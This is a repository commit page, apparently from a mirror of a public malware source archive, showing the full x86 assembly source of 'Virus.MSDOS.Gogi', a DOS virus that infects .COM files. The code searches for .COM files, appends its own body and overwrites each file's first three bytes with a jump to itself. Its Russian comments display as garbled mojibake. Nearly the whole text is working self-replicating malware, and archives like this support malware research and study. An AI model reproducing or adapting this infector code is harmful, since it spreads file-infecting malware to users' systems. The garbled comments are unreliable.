daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 07:49:24 +00:00
Code Issues Projects Releases Wiki Activity

fix/re-organize

Browse Source
This commit is contained in:
vxunderground
2022-08-21 04:12:28 -05:00
parent 4b9382ddbc
commit 62ca392943
8 changed files with 0 additions and 701 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSDOS/Virus.MSDOS.Gogi.asm
+165
View File
@@ -0,0 +1,165 @@
; Œ «¥­ìª¨© (¨«¨ ¡®«ì让) ¢¨àãá, § à ¦ î騩 .COM-¯à®£à ¬¬ë
; ¯à¨ § ¯ã᪥, ¥á«¨ ã ­¨å ­¥âã ¢­ ç «¥ JMP.
; ஢¥àª¨ ­  ¢á直¥ ¢áïç­®á⨠­¥ ¯à¨áãâáâ¢ãîâ.
;
; Copyright (c) 1992, Gogi&Givi International.
;
.model tiny
.code
org 0100h
start:
jmp virusstart ; ¥à¥å®¤ ­  ¢¨àãá:
mov ah,09h ; â ª¦¥, ª ª ¡ã¤¥â
int 21h ; á ¦¥à⢮© ¯à¨
mov ax,4C00h ; § à ¦¥­¨¨
int 21h
Message db 'This is little infection... He-he...',13,10,'$'
; „® á¨å ¯®à ­®à¬ «ì­ë©
; ª®¤ ¦¥àâ¢ë
virusstart: ; € íâ® ¢¨àãá
pushf
push ax ; ‘®å࠭塞 ¢á¥, çâ®
push bx ; ⮫쪮 ¬®¦­®...
push cx
push dx
push ds ; ¥ §­ î, ­ áª®«ìª®
push es ; íâ® ¯à ¢¨«ì­®...
push si
call SelfPoint
SelfPoint: ; Ž¯à¥¤¥«ï¥¬ â®çªã
pop si ; ¢å®¤ 
cld ; „¢¨¦¥¬áï ¢¯à ¢®
push cs ; ®áâ ¢¨¬ ᥣ¬¥­â­ë¥
pop ds ; ॣ¨áâàë ­ §­ ç¥­¨ï
push cs ; ¨ ®â¯à ¢«¥­¨ï
pop es
mov di,0100h ; ‚ ¯à¨¥¬­¨ª¥ - 0100h,
push si ; ­ ç «® ¯à®£à ¬¬ë
add si,original-SelfPoint ; ‘¥©ç á SI 㪠§ë¢ ¥â ­ 
mov cx,3 ; ®à¨£¨­ «ì­ë¥ ¡ ©âë
rep movsb ; ‘ª®¯¨à㥬 ¨å ¢ ­ ç «®
pop si ; § à ¦¥­­®© ¯à®£à ¬¬ë
mov ah,1Ah ; ®áâ ¢¨¬ ᮡá⢥­­ãî
mov dx,si ; DTA ¨§ ª®­æ  ¢¨àãá 
add dx,VirusDTA-SelfPoint ; 21h ¯à¥à뢠­¨¥¬
int 21h
mov ah,4Eh ; „¥« ¥¬ FindFirst
mov dx,si ; á ᮮ⢥âáâ¢ãî饩
add dx,FileMask-SelfPoint ; ¬ áª®©
mov cx,32 ; ¨  âਡã⮬ ç⥭¨¥/
int 21h ; § ¯¨áì, çâ®¡ë ­¥
; ¬ã¤à¨âì
jnc RepeatOpen ; Žè¨¡®ª ­¥â - ®âªà뢠¥¬
jmp OutVirus ; ¨§ª® ¯®è¥«...
RepeatOpen:
mov ax,3D02h ; Žâªà®¥¬ ä ©«
mov dx,si ; ¯à¨ ¯®¬®é¨ à áè¨à¥­­®£®
add dx,NameF-SelfPoint ; ã¯à ¢«¥­¨ï ®­ë¬
int 21h
jc OutVirus ; ਠ¢á¥å ®è¨¡ª å ¢ë室¨¬
mov bx,ax ; ‚®§ì¬¥¬ ­®¬¥à ä ©« ,
; ¨ ¡ã¤¥¬ ¤¥à¦ âìáï §  BX
mov ah,3Fh ; ‘ç¨â뢠¥¬ ­ áâ®ï騥
mov dx,si ; ª®¬ ­¤ë ¤«ï
add dx,Original-SelfPoint ; ¨á¯®«­¥­¨ï
mov cx,3 ; ãáâì ¡ã¤¥â âਠ¡ ©â 
int 21h
jc OutVirus ; Ž¯ïâì ¯à®¢¥à¨¬ ­  ®è¨¡ªã...
push bx
mov bx,dx
cmp byte ptr [bx],'é' ; ‚¤à㣠¢ í⮬ ä ©«¥
pop bx ; ⮦¥ á­ ç «  ¯¥à¥å®¤?
;
je CloseNotInfect ; ’®£¤  ­¥ § à ¦ âì!
; Žå, «¥­ì ¬­¥ ¯®â®ç­¥¥
; ¯à®¢¥àïâì...
mov ax,4202h ; à룠¥¬ ¢ ª®­¥æ
xor cx,cx ; ¦¥àâ¢ë (¨§­ á¨«®¢ ­¨ï)
xor dx,dx
int 21h ; ’¥¯¥àì ¢ AX «¥¦¨â
jc OutVirus ;  ¤à¥á ­ ç « 
; ¢¨àãá , ¥á«¨ ­¥â,
; ª®­¥ç­®, ®è¨¡ª¨
push ax
mov ah,40h ; ‡ ¯¨è¥¬
mov dx,si ; ⥫® ¢¨àãá 
sub dx,SelfPoint-VirusStart ; ¢ ä ©«-¦¥àâ¢ã
mov cx,VirusEnd-VirusStart ; Š®«¨ç¥á⢮ ¡ ©â
int 21h
pop ax
jc OutVirus ; Œ®¦¥â á«ãç¨âìáï ®è¨¡ª  -
; ¤¨áª, â ¬, ¯¥à¥¯®«­¥­...
sub ax,3 ; ‚ëç¨â ¥¬ 3 - ç⮡ë
push bx ; ¯®¯ áâì Šã¤   ¤®
mov bx,si
sub bx,SelfPoint-VirusStart
mov word ptr cs:[bx+1],ax ; Š« ¤¥¬  ¤à¥á
mov byte ptr [bx],'é' ; Š®¬ ­¤  ¯¥à¥å®¤  (¢
; ¯à¥¤¥« å ᥣ¬¥­â )
pop bx
mov ax,4200h ; € ⥯¥àì ¢ ­ ç «®
xor cx,cx ; ¦¥àâ¢ë
xor dx,dx
int 21h
jc OutVirus ; ஢¥àª  ­  ®è¨¡ªã
mov ah,40h ; ˆ § ¯¨è¥¬ â㤠
mov dx,si ; ª®¬ ­¤ã ¯¥à¥å®¤ 
sub dx,SelfPoint-VirusStart ; ­  ­ è¥ £­ãá­®¥
mov cx,3 ; ⥫®
int 21h
jc OutVirus ; Ž¯ïâì ¯à®¢¥à¨¬ ®è¨¡ª¨
mov ah,3Eh ; ” ©« ­ ¤® § ªàëâì
int 21h ; (Ž­ 㦥 § à ¦¥­ -
jmp OutVirus ; ¡®«ìè¥ ­¥ à ¡®â ¥¬)
CloseNotInfect:
mov ah,3Eh ; ‡ ªà뢠¥¬ ­¥¯®¤å®¤ï騩
int 21h ; ä ©«
mov dx,si
add dx,FileMask-SelfPoint ; ˆ ¤¥« ¥¬ FindNext
mov ah,4Fh
int 21h
jc OutVirus ; Žè¨¡ª  - §­ ç¨â, ­¥ áã¤ì¡ 
jmp RepeatOpen ; ˆ«¨ ¯¥à¥å®¤ ­  ®âªàë⨥
OutVirus:
pop si ; ˆ, ª®­¥ç­® ¦¥,
pop es ; ¢á¥ ­  ᢥâ¥
pop ds ; ¢®ááâ ­®¢¨âì
pop dx
pop cx
pop bx
pop ax
popf
mov si,0100h ; ‡ ­®á¨¬ ¢ á⥪  ¤à¥á
push si ; ­ ç «  ¯à®£à ¬¬ë
ret ; ¨ ¤¥« ¥¬ RET
;  è¨ ¤ ­­ë¥:
VirusDTA db 30 dup (0) ; â® DTA
NameF db 13 dup (0) ; ’ã⠡㤥⠨¬ï ä ©« 
FileMask db '*.cOm',(0) ; ‚®â â ª ï ªà á¨¢ ï
; ¬ áª 
original:
mov dx,offset Message ; € íâ® ®à¨£¨­ «ì­ë¥ ¡ ©âë
VirusEnd: ; ¨§ ¦¥àâ¢ë (‹®§¨­áª¨©,
; ­¥ §¥¢ ©!)
end start